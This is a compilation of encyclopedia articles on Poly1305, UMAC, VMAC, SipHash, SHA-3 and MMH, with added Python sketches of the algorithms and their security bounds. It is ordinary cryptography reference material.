The value of k, which describes the length of the message and key vectors, has several effects on the construction. Halevi and Krawczyk reported timing results for various implementations of MMH in 1997.[4]
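A minimal Python sketch of the MMH* inner-product hash described above; the prime is the 32-bit choice discussed in the text, and the vector length k = 4 and sample message are arbitrary illustrative values (this demonstrates the ∆-universal hash only, not a complete MAC).

    import secrets

    p = 2**32 + 15                    # a prime just above 2^32, as in MMH*_32

    def mmh_star(x: list[int], m: list[int]) -> int:
        # Inner product of key vector x and message vector m, modulo the prime p.
        assert len(x) == len(m)
        return sum(mi * xi for mi, xi in zip(m, x)) % p

    key = [secrets.randbelow(p) for _ in range(4)]    # secret key vector (k = 4)
    msg = [0x11111111, 0x22222222, 0x33333333, 0x44444444]
    print(mmh_star(key, msg))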
https://en.wikipedia.org/wiki/MMH-Badger_MAC
Poly1305 is a universal hash family designed by Daniel J. Bernstein in 2002 for use in cryptography.[1][2]

As with any universal hash family, Poly1305 can be used as a one-time message authentication code to authenticate a single message using a secret key shared between sender and recipient,[3] similar to the way that a one-time pad can be used to conceal the content of a single message using a secret key shared between sender and recipient.

Originally Poly1305 was proposed as part of Poly1305-AES,[2] a Carter–Wegman authenticator[4][5][1] that combines the Poly1305 hash with AES-128 to authenticate many messages using a single short key and distinct message numbers. Poly1305 was later applied with a single-use key generated for each message using XSalsa20 in the NaCl crypto_secretbox_xsalsa20poly1305 authenticated cipher,[6] and then using ChaCha in the ChaCha20-Poly1305 authenticated cipher[7][8][1] deployed in TLS on the internet.[9]

Poly1305 takes a 16-byte secret key r and an L-byte message m and returns a 16-byte hash Poly1305_r(m). To do this, Poly1305 interprets the restricted key r as a little-endian integer, breaks the message into 16-byte chunks from which it derives the coefficients c_i below, evaluates the polynomial c_1 r^q + c_2 r^(q−1) + ⋯ + c_q r modulo the prime 2^130 − 5, and reduces the result modulo 2^128, encoded as a 16-byte little-endian string.[2][1]

The coefficients c_i of the polynomial, where q = ⌈L/16⌉, are

c_i = m[16i−16] + 2^8 m[16i−15] + 2^16 m[16i−14] + ⋯ + 2^120 m[16i−1] + 2^128,

with the exception that, if L ≢ 0 (mod 16), then

c_q = m[16q−16] + 2^8 m[16q−15] + ⋯ + 2^(8(L mod 16)−8) m[L−1] + 2^(8(L mod 16)).

The secret key r = (r[0], r[1], r[2], ..., r[15]) is restricted to have the bytes r[3], r[7], r[11], r[15] ∈ {0, 1, 2, ..., 15}, i.e., to have their top four bits clear, and the bytes r[4], r[8], r[12] ∈ {0, 4, 8, ..., 252}, i.e., to have their bottom two bits clear. Thus there are 2^106 distinct possible values of r.

If s is a secret 16-byte string interpreted as a little-endian integer, then

a := (Poly1305_r(m) + s) mod 2^128

is called the authenticator for the message m. If a sender and recipient share the 32-byte secret key (r, s) in advance, chosen uniformly at random, then the sender can transmit an authenticated message (a, m). When the recipient receives an alleged authenticated message (a′, m′) (which may have been modified in transit by an adversary), they can verify its authenticity by testing whether

a′ =? (Poly1305_r(m′) + s) mod 2^128.

Without knowledge of (r, s), the adversary has probability 8⌈L/16⌉/2^106 of finding any (a′, m′) ≠ (a, m) that will pass verification. However, the same key (r, s) must not be reused for two messages.
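The one-time authenticator described above fits in a few lines of Python. This is a readability-first sketch of the published algorithm (using Horner evaluation of the polynomial), not an optimized or side-channel-hardened implementation:

# One-time Poly1305 authenticator: tag = (Poly1305_r(m) + s) mod 2^128.
P1305 = (1 << 130) - 5          # the prime 2^130 - 5

def clamp(r: bytes) -> int:
    r = bytearray(r)
    for i in (3, 7, 11, 15):
        r[i] &= 0x0f            # clear top four bits of r[3], r[7], r[11], r[15]
    for i in (4, 8, 12):
        r[i] &= 0xfc            # clear bottom two bits of r[4], r[8], r[12]
    return int.from_bytes(r, "little")

def poly1305_tag(r: bytes, s: bytes, m: bytes) -> bytes:
    rr, h = clamp(r), 0
    for i in range(0, len(m), 16):
        chunk = m[i:i + 16]
        # coefficient c_i: chunk as little-endian integer plus the 2^(8*len) pad
        c = int.from_bytes(chunk, "little") + (1 << (8 * len(chunk)))
        h = ((h + c) * rr) % P1305   # Horner step; ends as c_1 r^q + ... + c_q r
    return ((h + int.from_bytes(s, "little")) % (1 << 128)).to_bytes(16, "little")

# Should reproduce the worked example in RFC 8439, section 2.5.2:
r = bytes.fromhex("85d6be7857556d337f4452fe42d506a8")
s = bytes.fromhex("0103808afb0db2fd4abff6af4149f51b")
print(poly1305_tag(r, s, b"Cryptographic Forum Research Group").hex())
# expected: a8061dc1305136c6c22b8baf0c0127a9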
If the adversary learns

a_1 = (Poly1305_r(m_1) + s) mod 2^128 and
a_2 = (Poly1305_r(m_2) + s) mod 2^128

for m_1 ≠ m_2, they can subtract

a_1 − a_2 ≡ Poly1305_r(m_1) − Poly1305_r(m_2) (mod 2^128)

and find a root of the resulting polynomial to recover a small list of candidates for the secret evaluation point r, and from that the secret pad s. The adversary can then use this to forge additional messages with high probability.

The original Poly1305-AES proposal[2] uses the Carter–Wegman structure[4][5] to authenticate many messages by taking a_i := H_r(m_i) + p_i as the authenticator on the i-th message m_i, where H_r is a universal hash family and p_i is an independent uniform random hash value that serves as a one-time pad to conceal it. Poly1305-AES uses AES-128 to generate p_i := AES_k(i), where i is encoded as a 16-byte little-endian integer.

Specifically, a Poly1305-AES key is a 32-byte pair (r, k) of a 16-byte evaluation point r, as above, and a 16-byte AES key k. The Poly1305-AES authenticator on a message m_i is

a_i := (Poly1305_r(m_i) + AES_k(i)) mod 2^128,

where 16-byte strings and integers are identified by little-endian encoding. Note that r is reused between messages.

Without knowledge of (r, k), the adversary has low probability of forging any authenticated messages that the recipient will accept as genuine. Suppose the adversary sees C authenticated messages and attempts D forgeries, and can distinguish AES_k from a uniform random permutation with advantage at most δ. (Unless AES is broken, δ is very small.) The adversary's chance of success at a single forgery is at most

δ + (1 − C/2^128)^(−(C+1)/2) · 8D⌈L/16⌉ / 2^106.

The message number i must never be repeated with the same key (r, k). If it is, the adversary can recover a small list of candidates for r and AES_k(i), as with the one-time authenticator, and use that to forge messages.

The NaCl crypto_secretbox_xsalsa20poly1305 authenticated cipher uses a message number i with the XSalsa20 stream cipher to generate a per-message key stream, the first 32 bytes of which are taken as a one-time Poly1305 key (r_i, s_i) and the rest of which is used for encrypting the message.
It then uses Poly1305 as a one-time authenticator for the ciphertext of the message.[6] ChaCha20-Poly1305 does the same but with ChaCha instead of XSalsa20.[8] XChaCha20-Poly1305, using XChaCha20 instead of XSalsa20, has also been described.[10]

The security of Poly1305 and its derivatives against forgery follows from its bounded difference probability as a universal hash family: if m_1 and m_2 are messages of up to L bytes each, and d is any 16-byte string interpreted as a little-endian integer, then

Pr[ Poly1305_r(m_1) − Poly1305_r(m_2) ≡ d (mod 2^128) ] ≤ 8⌈L/16⌉ / 2^106,

where r is a uniform random Poly1305 key.[2]: Theorem 3.3, p. 8

This property is sometimes called ε-almost-∆-universality over Z/2^128 Z, or ε-A∆U,[11] where ε = 8⌈L/16⌉/2^106 in this case.

With a one-time authenticator a = (Poly1305_r(m) + s) mod 2^128, the adversary's success probability for any forgery attempt (a′, m′) on a message m′ of up to L bytes is

Pr[ a′ = Poly1305_r(m′) + s | a = Poly1305_r(m) + s ]
  = Pr[ a′ = Poly1305_r(m′) + a − Poly1305_r(m) ]
  = Pr[ Poly1305_r(m′) − Poly1305_r(m) = a′ − a ]
  ≤ 8⌈L/16⌉ / 2^106.

Here arithmetic inside the Pr[⋯] is taken in Z/2^128 Z for simplicity.

For NaCl crypto_secretbox_xsalsa20poly1305 and ChaCha20-Poly1305, the adversary's success probability at forgery is the same for each message independently as for a one-time authenticator, plus the adversary's distinguishing advantage δ against XSalsa20 or ChaCha as pseudorandom functions used to generate the per-message key.
In other words, the probability that the adversary succeeds at a single forgery after D attempts on messages of up to L bytes is at most

δ + 8D⌈L/16⌉ / 2^106.

The security of Poly1305-AES against forgery follows from the Carter–Wegman–Shoup structure, which instantiates a Carter–Wegman authenticator with a permutation to generate the per-message pad.[12] If an adversary sees C authenticated messages and attempts D forgeries of messages of up to L bytes, and if the adversary has distinguishing advantage at most δ against AES-128 as a pseudorandom permutation, then the probability the adversary succeeds at any one of the D forgeries is at most:[2]

δ + (1 − C/2^128)^(−(C+1)/2) · 8D⌈L/16⌉ / 2^106.

For instance, assume that messages are packets of up to 1024 bytes, that the attacker sees 2^64 messages authenticated under a Poly1305-AES key, that the attacker attempts a whopping 2^75 forgeries, and that the attacker cannot break AES with probability above δ. Then, with probability at least 0.999999 − δ, all 2^75 forgeries are rejected.

Poly1305-AES can be computed at high speed in various CPUs: for an n-byte message, no more than 3.1n + 780 Athlon cycles are needed,[2] for example. The author has released optimized source code for Athlon, Pentium Pro/II/III/M, PowerPC, and UltraSPARC, in addition to non-optimized reference implementations in C and C++ as public domain software.[13]

Below is a list of cryptography libraries that support Poly1305:
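The numbers in the packet example above can be checked directly from the stated bound. Evaluating it with L = 1024, C = 2^64 and D = 2^75 (and ignoring δ), using exp/log1p so the first factor does not round to 1.0 in floating point:

from math import ceil, exp, log1p

L, C, D = 1024, 2**64, 2**75
# (1 - C/2^128)^(-(C+1)/2), evaluated stably; comes out near e^0.5 ~ 1.65
factor = exp(-(C + 1) / 2 * log1p(-C / 2**128))
bound = factor * 8 * D * ceil(L / 16) / 2**106
print(bound)   # ~ 3.9e-07, i.e. all forgeries rejected with probability > 0.999999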
https://en.wikipedia.org/wiki/Poly1305
In cryptography, a universal hashing message authentication code, or UMAC, is a message authentication code (MAC) calculated using universal hashing, which involves choosing a hash function from a class of hash functions according to some secret (random) process and applying it to the message. The resulting digest or fingerprint is then encrypted to hide the identity of the hash function that was used. A variation of the scheme was first published in 1999.[1] As with any MAC, it may be used to simultaneously verify both the data integrity and the authenticity of a message. In contrast to traditional MACs, which are serializable, a UMAC can be executed in parallel. Thus, as machines continue to offer more parallel-processing capabilities, the speed of implementing UMAC can increase.[1]

A specific type of UMAC, also commonly referred to just as "UMAC", is described in an informational RFC published as RFC 4418 in March 2006. It has provable cryptographic strength and is usually substantially less computationally intensive than other MACs. UMAC's design is optimized for 32-bit architectures with SIMD support, with a performance of 1 CPU cycle per byte (cpb) with SIMD and 2 cpb without SIMD. A closely related variant of UMAC that is optimized for 64-bit architectures is given by VMAC, which was submitted to the IETF as a draft in April 2007 (draft-krovetz-vmac-01) but never gathered enough attention to be approved as an RFC.

Suppose the hash function is chosen from a class of hash functions H, which maps messages into D, the set of possible message digests. This class is called universal if, for any distinct pair of messages, there are at most |H|/|D| functions that map them to the same member of D. This means that if an attacker wants to replace one message with another and, from his point of view, the hash function was chosen completely randomly, the probability that the UMAC will not detect his modification is at most 1/|D|.

But this definition is not strong enough: if the possible messages are 0 and 1, D = {0, 1}, and H consists of the identity operation and NOT, then H is universal. Yet even if the digest is encrypted by modular addition, the attacker can change the message and the digest at the same time and the receiver wouldn't know the difference.

A class of hash functions H that is good to use will make it difficult for an attacker to guess the correct digest d of a fake message f after intercepting one message a with digest c. In other words, the probability Pr_h[ h(f) = d | h(a) = c ] needs to be very small, preferably 1/|D|.

It is easy to construct such a class of hash functions when D is a field. For example, if |D| is prime, all the operations are taken modulo |D|. The message a is then encoded as an n-dimensional vector over D, (a_1, a_2, ..., a_n). H then has |D|^(n+1) members, each corresponding to an (n + 1)-dimensional vector over D, (h_0, h_1, ..., h_n). If we let

h(a) = h_0 + Σ_{i=1}^n h_i a_i (mod |D|),

we can use the rules of probabilities and combinatorics to prove that

Pr_h[ h(f) = d | h(a) = c ] = 1/|D|.

If we properly encrypt all the digests (e.g. with a one-time pad), an attacker cannot learn anything from them, and the same hash function can be used for all communication between the two parties. This may not be true for ECB encryption because it may be quite likely that two messages produce the same hash value. Then some kind of initialization vector should be used, which is often called the nonce. It has become common practice to set h_0 = f(nonce), where f is also secret. Notice that having massive amounts of computer power does not help the attacker at all.
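A sketch of this strongly universal construction, with an illustrative prime |D| (any prime works):

# h(a) = h0 + h1*a1 + ... + hn*an (mod p), with the secret key (h0, ..., hn).
import secrets

p = 2**31 - 1                      # illustrative prime; |D| = p
n = 4                              # message length in field elements

def h(key, a):
    h0, coeffs = key[0], key[1:]
    return (h0 + sum(hi * ai for hi, ai in zip(coeffs, a))) % p

key = tuple(secrets.randbelow(p) for _ in range(n + 1))
print(h(key, (10, 20, 30, 40)))

Because h_0 acts as a uniform additive mask, observing one (message, digest) pair reveals nothing about the digest of any other message, which is the 1/|D| guessing bound described above.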
If the recipient limits the number of forgeries it accepts (by sleeping whenever it detects one), |D| can be 2^32 or smaller.

The C function given in the original presentation generates a 24-bit UMAC. It assumes that secret is a multiple of 24 bits, that msg is not longer than secret, and that result already contains the 24 secret bits, e.g. f(nonce). The nonce does not need to be contained in msg.

Functions in the above unnamed strongly universal hash-function family use n multiplies to compute a hash value. The NH family halves the number of multiplications, which roughly translates to a two-fold speed-up in practice.[2] For speed, UMAC uses the NH hash-function family. NH is specifically designed to use SIMD instructions, and hence UMAC is the first MAC function optimized for SIMD.[1]

The following hash family is 2^−w-universal:[1]

NH_K(M) = ( Σ_{i=1}^{k/2} ((m_{2i−1} + k_{2i−1}) mod 2^(w/2)) · ((m_{2i} + k_{2i}) mod 2^(w/2)) ) mod 2^w,

where the message M = (m_1, ..., m_k) and the key K = (k_1, ..., k_k) are vectors of (w/2)-bit words.

Practically, NH is done in unsigned integers. All multiplications are mod 2^w, all additions mod 2^(w/2), and all inputs are vectors of half-words (w/2 = 32-bit integers). The algorithm then uses ⌈k/2⌉ multiplications, where k is the number of half-words in the vector. Thus the algorithm runs at a "rate" of one multiplication per word of input.

RFC 4418 is an informational RFC that describes a wrapping of NH for UMAC. The overall UHASH ("Universal Hash Function") routine produces a variable length of tags, which corresponds to the number of iterations (and the total lengths of keys) needed in all three layers of its hashing. Several calls to an AES-based key derivation function are used to provide keys for all three keyed hashes.

In RFC 4418, NH is rearranged into an interleaved form. This definition is designed to encourage programmers to use SIMD instructions in the accumulation, since only data four indices apart is likely not to be put in the same SIMD register, and hence faster to multiply in bulk. On a hypothetical machine, each accumulation step then translates to a single vector multiply-accumulate.
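A sketch of NH as defined above, with w = 64 so the half-words are 32-bit integers (sequential rather than the RFC's interleaved ordering):

# NH with w = 64: pairwise add mod 2^32, multiply, accumulate mod 2^64.
MASK32 = (1 << 32) - 1
MASK64 = (1 << 64) - 1

def nh(key, msg):
    """key and msg are equal-length lists of 32-bit words; length must be even."""
    assert len(key) == len(msg) and len(msg) % 2 == 0
    acc = 0
    for i in range(0, len(msg), 2):
        a = (msg[i] + key[i]) & MASK32           # addition mod 2^(w/2)
        b = (msg[i + 1] + key[i + 1]) & MASK32
        acc = (acc + a * b) & MASK64             # accumulate mod 2^w
    return acc

print(hex(nh([1, 2, 3, 4], [10, 20, 30, 40])))

Note the halved multiplication count: one multiply per pair of input words, versus one per word in the h_0 + Σ h_i a_i construction above.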
https://en.wikipedia.org/wiki/UMAC_(cryptography)
VMAC is a block cipher-based message authentication code (MAC) algorithm using a universal hash, proposed by Ted Krovetz and Wei Dai in April 2007. The algorithm was designed for high performance backed by a formal analysis.[citation needed]

VMAC is designed to have exceptional performance in software on 64-bit CPU architectures while still performing well on 32-bit architectures.[citation needed] Measured speeds are as fast as one-half CPU cycle per byte (cpb) on 64-bit architectures, under five cpb on desktop 32-bit processors, and around ten cpb on embedded 32-bit architectures.[1] A closely related variant of VMAC that is optimized for 32-bit architectures is given by UMAC.

VMAC is a MAC in the style of Wegman and Carter.[2][3] A fast "universal" hash function is used to hash an input message M into a short string.[citation needed] This short string is then combined by addition with a pseudorandom pad, resulting in the VMAC tag. Security depends on the sender and receiver sharing a randomly chosen secret hash function and pseudorandom pad. This is achieved by using a keyed hash function H and a pseudorandom function F. A tag is generated by performing the computation

Tag = H(K1, M) + F(K2, Nonce),

where K1 and K2 are secret random keys shared by sender and receiver, and Nonce is a value that changes with each generated tag. The receiver needs to know which nonce was used by the sender, so some method of synchronizing nonces needs to be used. This can be done by explicitly sending the nonce along with the message and tag, or by agreeing upon the use of some other non-repeating value such as a sequence number. The nonce need not be kept secret, but care must be taken to ensure that, over the lifetime of a VMAC key, a different nonce is used with each message.

VMAC uses a function called VHASH (also specified in the draft) as the keyed hash function H, and uses a pseudorandom function F whose default implementation uses the AES block cipher. VMAC allows for tag lengths of any 64-bit multiple up to the block size of the block cipher in use. When using AES, this means VMAC can produce 64- or 128-bit tags.

The theory of Wegman–Carter MACs and the analysis of VMAC show that if one "instantiates" VMAC with truly random keys and pads, then the probability that an attacker (even a computationally unbounded one) produces a correct tag for messages of its choosing is less than 1/2^60 or 1/2^120 when the tags are of length 64 or 128 bits, respectively. When an attacker makes N forgery attempts, the probability of getting one or more tags right increases linearly to less than N/2^60 or N/2^120.

In an applied implementation of VMAC, using AES to produce keys and pads, these forgery probabilities increase by a small amount related to the security of AES. As long as AES is secure, this small additive term is insignificant for any practical attack. See the specification for more details.

Analysis of VMAC security has been carried out by the authors Wei Dai and Ted Krovetz.[citation needed][4]
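The Wegman–Carter shape of the tag computation can be sketched generically. The code below is not VMAC itself (there is no VHASH here, and HMAC-SHA-256 stands in for the AES-based PRF F), but the tag = hash + pad structure is the one described above:

import hmac, hashlib, secrets

P = 2**61 - 1   # illustrative prime for a toy polynomial universal hash

def toy_hash(k1, words):
    """Toy universal hash standing in for VHASH."""
    h = 0
    for w in words:
        h = (h * k1 + w) % P
    return h

def prf(k2, nonce):
    """Stand-in PRF; VMAC's default F uses AES, not HMAC."""
    d = hmac.new(k2, nonce, hashlib.sha256).digest()
    return int.from_bytes(d[:8], "little")

def wc_tag(k1, k2, words, nonce):
    return (toy_hash(k1, words) + prf(k2, nonce)) % 2**64

k1, k2 = secrets.randbelow(P), secrets.token_bytes(32)
print(wc_tag(k1, k2, [1, 2, 3], b"nonce-0001"))

Reusing a nonce under the same key collapses the pad and exposes hash differences, which is why the text insists on a fresh nonce per message.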
https://en.wikipedia.org/wiki/VMAC
SipHash is an add–rotate–xor (ARX) based family of pseudorandom functions created by Jean-Philippe Aumasson and Daniel J. Bernstein in 2012,[1]: 165[2] in response to a spate of "hash flooding" denial-of-service attacks (HashDoS) in late 2011.[3]

SipHash is designed as a secure pseudorandom function and can also be used as a secure message authentication code (MAC). SipHash, however, is not a general-purpose key-less hash function such as the Secure Hash Algorithms (SHA) and therefore must always be used with a secret key in order to be secure. That is, SHA is designed so that it is difficult for an attacker to find two messages X and Y such that SHA(X) = SHA(Y), even though anyone may compute SHA(X). SipHash instead guarantees that, having seen X_i and SipHash(X_i, k), an attacker who does not know the key k cannot find (any information about) k or SipHash(Y, k) for any message Y ∉ {X_i} which they have not seen before.

SipHash computes a 64-bit message authentication code from a variable-length message and a 128-bit secret key. It was designed to be efficient even for short inputs, with performance comparable to non-cryptographic hash functions, such as CityHash;[4]: 496[2] this can be used to prevent denial-of-service attacks against hash tables ("hash flooding"),[5] or to authenticate network packets. A variant was later added which produces a 128-bit result.[6]

An unkeyed hash function such as SHA is collision-resistant only if the entire output is used. If used to generate a small output, such as an index into a hash table of practical size, then no algorithm can prevent collisions; an attacker need only make as many attempts as there are possible outputs.

For example, suppose a network server is designed to be able to handle up to a million requests at once. It keeps track of incoming requests in a hash table with two million entries, using a hash function to map identifying information from each request to one of the two million possible table entries. An attacker who knows the hash function need only feed it arbitrary inputs; one out of two million will have a specific hash value. If the attacker now sends a few hundred requests all chosen to have the same hash value to the server, that will produce a large number of hash collisions, slowing (or possibly stopping) the server with an effect similar to a packet flood of many million requests.[7]

By using a key unknown to the attacker, a keyed hash function like SipHash prevents this sort of attack. While it is possible to add a key to an unkeyed hash function (HMAC is a popular technique), SipHash is much more efficient.

Functions in the SipHash family are specified as SipHash-c-d, where c is the number of rounds per message block and d is the number of finalization rounds. The recommended parameters are SipHash-2-4 for best performance, and SipHash-4-8 for conservative security. A few languages use SipHash-1-3 for performance at the risk of yet-unknown DoS attacks.[8]

The reference implementation was released as public domain software under the CC0.[6]

SipHash is used in hash table implementations of various software:[9]

The following programs use SipHash in other ways:

Implementations
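As a concrete illustration of the SipHash-c-d structure, here is a compact Python sketch of SipHash-2-4 (64-bit output), written from the published description; production code should use the reference implementation:

M64 = (1 << 64) - 1

def rotl(x, b):
    return ((x << b) | (x >> (64 - b))) & M64

def sipround(v0, v1, v2, v3):
    v0 = (v0 + v1) & M64; v1 = rotl(v1, 13); v1 ^= v0; v0 = rotl(v0, 32)
    v2 = (v2 + v3) & M64; v3 = rotl(v3, 16); v3 ^= v2
    v0 = (v0 + v3) & M64; v3 = rotl(v3, 21); v3 ^= v0
    v2 = (v2 + v1) & M64; v1 = rotl(v1, 17); v1 ^= v2; v2 = rotl(v2, 32)
    return v0, v1, v2, v3

def siphash24(key: bytes, msg: bytes) -> int:
    assert len(key) == 16
    k0 = int.from_bytes(key[:8], "little")
    k1 = int.from_bytes(key[8:], "little")
    # initialization constants spell "somepseudorandomlygeneratedbytes"
    v0 = k0 ^ 0x736F6D6570736575
    v1 = k1 ^ 0x646F72616E646F6D
    v2 = k0 ^ 0x6C7967656E657261
    v3 = k1 ^ 0x7465646279746573
    # pad with zeros to a multiple of 8 bytes; final byte = message length mod 256
    padded = msg + b"\x00" * (7 - len(msg) % 8) + bytes([len(msg) % 256])
    for i in range(0, len(padded), 8):
        m = int.from_bytes(padded[i:i + 8], "little")
        v3 ^= m
        for _ in range(2):                   # c = 2 compression rounds
            v0, v1, v2, v3 = sipround(v0, v1, v2, v3)
        v0 ^= m
    v2 ^= 0xFF
    for _ in range(4):                       # d = 4 finalization rounds
        v0, v1, v2, v3 = sipround(v0, v1, v2, v3)
    return v0 ^ v1 ^ v2 ^ v3

# Should match the paper's first test vector:
print(hex(siphash24(bytes(range(16)), b"")))   # expected 0x726fdb47dd0e0e31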
https://en.wikipedia.org/wiki/SipHash
SHA-3 (Secure Hash Algorithm 3) is the latest[4] member of the Secure Hash Algorithm family of standards, released by NIST on August 5, 2015.[5][6][7] Although part of the same series of standards, SHA-3 is internally different from the MD5-like structure of SHA-1 and SHA-2.

SHA-3 is a subset of the broader cryptographic primitive family Keccak (/ˈkɛtʃæk/ or /ˈkɛtʃɑːk/),[8][9] designed by Guido Bertoni, Joan Daemen, Michaël Peeters, and Gilles Van Assche, building upon RadioGatún. Keccak's authors have proposed additional uses for the function, not (yet) standardized by NIST, including a stream cipher, an authenticated encryption system, a "tree" hashing scheme for faster hashing on certain architectures,[10][11] and the AEAD ciphers Keyak and Ketje.[12][13]

Keccak is based on a novel approach called sponge construction.[14] Sponge construction is based on a wide random function or random permutation, and allows inputting ("absorbing" in sponge terminology) any amount of data and outputting ("squeezing") any amount of data, while acting as a pseudorandom function with regard to all previous inputs. This leads to great flexibility.

As of 2022, NIST does not plan to withdraw SHA-2 or remove it from the revised Secure Hash Standard.[15] The purpose of SHA-3 is that it can be directly substituted for SHA-2 in current applications if necessary, and to significantly improve the robustness of NIST's overall hash algorithm toolkit.[16]

For small message sizes, the creators of the Keccak algorithms and the SHA-3 functions suggest using the faster function KangarooTwelve with adjusted parameters and a new tree hashing mode without extra overhead.

The Keccak algorithm is the work of Guido Bertoni, Joan Daemen (who also co-designed the Rijndael cipher with Vincent Rijmen), Michaël Peeters, and Gilles Van Assche. It is based on earlier hash function designs PANAMA and RadioGatún. PANAMA was designed by Daemen and Craig Clapp in 1998. RadioGatún, a successor of PANAMA, was designed by Daemen, Peeters, and Van Assche, and was presented at the NIST Hash Workshop in 2006.[17] The reference implementation source code was dedicated to the public domain via a CC0 waiver.[18]

In 2006, NIST started to organize the NIST hash function competition to create a new hash standard, SHA-3. SHA-3 is not meant to replace SHA-2, as no significant attack on SHA-2 has been publicly demonstrated[needs update]. Because of the successful attacks on MD5, SHA-0 and SHA-1,[19][20] NIST perceived a need for an alternative, dissimilar cryptographic hash, which became SHA-3.

After a setup period, admissions were to be submitted by the end of 2008. Keccak was accepted as one of the 51 candidates. In July 2009, 14 algorithms were selected for the second round. Keccak advanced to the last round in December 2010.[21]

During the competition, entrants were permitted to "tweak" their algorithms to address issues that were discovered. Changes that have been made to Keccak are:[22][23]

On October 2, 2012, Keccak was selected as the winner of the competition.[8]

In 2014, NIST published a draft FIPS 202, "SHA-3 Standard: Permutation-Based Hash and Extendable-Output Functions".[24] FIPS 202 was approved on August 5, 2015.[25] On the same day, NIST announced that SHA-3 had become a hashing standard.[26]

In early 2013, NIST announced they would select different values for the "capacity", the overall strength vs. speed parameter, for the SHA-3 standard, compared to the submission.[27][28] The changes caused some turmoil.
The hash function competition called for hash functions at least as secure as the SHA-2 instances. This means that a d-bit output should have d/2-bit resistance to collision attacks and d-bit resistance to preimage attacks, the maximum achievable for d bits of output. Keccak's security proof allows an adjustable level of security based on a "capacity" c, providing c/2-bit resistance to both collision and preimage attacks. To meet the original competition rules, Keccak's authors proposed c = 2d. The announced change was to accept the same d/2-bit security for all forms of attack and standardize c = d. This would have sped up Keccak by allowing an additional d bits of input to be hashed each iteration. However, the hash functions would not have been drop-in replacements with the same preimage resistance as SHA-2 any more; it would have been cut in half, making it vulnerable to advances in quantum computing, which effectively would cut it in half once more.[29]

In September 2013, Daniel J. Bernstein suggested on the NIST hash-forum mailing list[30] strengthening the security to the 576-bit capacity that was originally proposed as the default Keccak, in addition to and not included in the SHA-3 specifications.[31] This would have provided at least a SHA3-224 and SHA3-256 with the same preimage resistance as their SHA-2 predecessors, but SHA3-384 and SHA3-512 would have had significantly less preimage resistance than their SHA-2 predecessors. In late September, the Keccak team responded by stating that they had already proposed 128-bit security by setting c = 256 as an option in their SHA-3 proposal.[32] Although the reduced capacity was justifiable in their opinion, in the light of the negative response they proposed raising the capacity to c = 512 bits for all instances. This would be as much as any previous standard up to the 256-bit security level, while providing reasonable efficiency,[33] but not the 384-/512-bit preimage resistance offered by SHA2-384 and SHA2-512. The authors stated that "claiming or relying on security strength levels above 256 bits is meaningless".

In early October 2013, Bruce Schneier criticized NIST's decision on the basis of its possible detrimental effects on the acceptance of the algorithm, saying:

There is too much mistrust in the air. NIST risks publishing an algorithm that no one will trust and no one (except those forced) will use.[34]

He later retracted his earlier statement, saying:

I misspoke when I wrote that NIST made "internal changes" to the algorithm. That was sloppy of me. The Keccak permutation remains unchanged. What NIST proposed was reducing the hash function's capacity in the name of performance. One of Keccak's nice features is that it's highly tunable.[34]

Paul Crowley, a cryptographer and senior developer at an independent software development company, expressed his support of the decision, saying that Keccak is supposed to be tunable and there is no reason for different security levels within one primitive. He also added:

Yes, it's a bit of a shame for the competition that they demanded a certain security level for entrants, then went to publish a standard with a different one. But there's nothing that can be done to fix that now, except re-opening the competition.
Demanding that they stick to their mistake doesn't improve things for anyone.[35]

There was some confusion that internal changes may have been made to Keccak, which was cleared up by the original team, stating that NIST's proposal for SHA-3 is a subset of the Keccak family, for which one can generate test vectors using their reference code submitted to the contest, and that this proposal was the result of a series of discussions between them and the NIST hash team.[36]

In response to the controversy, in November 2013 John Kelsey of NIST proposed to go back to the original c = 2d proposal for all SHA-2 drop-in replacement instances.[37] The reversion was confirmed in subsequent drafts[38] and in the final release.[5]

SHA-3 uses the sponge construction,[14] in which data is "absorbed" into the sponge, then the result is "squeezed" out. In the absorbing phase, message blocks are XORed into a subset of the state, which is then transformed as a whole using a permutation function (or transformation) f. In the "squeeze" phase, output blocks are read from the same subset of the state, alternated with the state transformation function f. The size of the part of the state that is written and read is called the "rate" (denoted r), and the size of the part that is untouched by input/output is called the "capacity" (denoted c). The capacity determines the security of the scheme. The maximum security level is half the capacity.

Given an input bit string N, a padding function pad, a permutation function f that operates on bit blocks of width b, a rate r and an output length d, we have capacity c = b − r, and the sponge construction Z = sponge[f, pad, r](N, d), yielding a bit string Z of length d, works as follows:[6]: 18

• The input N is padded using the pad function, then split into r-bit blocks P_1, ..., P_n.
• The b bits of the state S are initialized to zero.
• Absorbing: for each block P_i, the state is replaced by f(S ⊕ (P_i ∥ 0^c)).
• Squeezing: the first r bits of S are emitted as output; if more output is needed, S is replaced by f(S) and the process repeats.
• The output Z is the concatenation of the emitted bits, truncated to d bits.

The fact that the internal state S contains c additional bits of information in addition to what is output to Z prevents the length extension attacks that SHA-2, SHA-1, MD5 and other hashes based on the Merkle–Damgård construction are susceptible to.

In SHA-3, the state S consists of a 5 × 5 array of w-bit words (with w = 64), b = 5 × 5 × w = 5 × 5 × 64 = 1600 bits total. Keccak is also defined for smaller power-of-2 word sizes w down to 1 bit (a total state of 25 bits). Small state sizes can be used to test cryptanalytic attacks, and intermediate state sizes (from w = 8, 200 bits, to w = 32, 800 bits) can be used in practical, lightweight applications.[12][13]

For the SHA3-224, SHA3-256, SHA3-384, and SHA3-512 instances, r is greater than d, so there is no need for additional block permutations in the squeezing phase; the leading d bits of the state are the desired hash. However, SHAKE128 and SHAKE256 allow an arbitrary output length, which is useful in applications such as optimal asymmetric encryption padding.

To ensure the message can be evenly divided into r-bit blocks, padding is required. SHA-3 uses the pattern 10...01 in its padding function: a 1 bit, followed by zero or more 0 bits (at most r − 1) and a final 1 bit. The maximum of r − 1 zero bits occurs when the last message block is r − 1 bits long. Then another block is added after the initial 1 bit, containing r − 1 zero bits before the final 1 bit.
The two 1 bits will be added even if the length of the message is already divisible by r.[6]: 5.1 In this case, another block is added to the message, containing a 1 bit, followed by a block of r − 2 zero bits and another 1 bit. This is necessary so that a message with length divisible by r ending in something that looks like padding does not produce the same hash as the message with those bits removed.

The initial 1 bit is required so that messages differing only in a few additional 0 bits at the end do not produce the same hash. The position of the final 1 bit indicates which rate r was used (multi-rate padding), which is required for the security proof to work for different hash variants. Without it, different hash variants of the same short message would be the same up to truncation.

The block transformation f, which is Keccak-f[1600] for SHA-3, is a permutation that uses XOR, AND and NOT operations, and is designed for easy implementation in both software and hardware. It is defined for any power-of-two word size, w = 2^ℓ bits. The main SHA-3 submission uses 64-bit words, ℓ = 6.

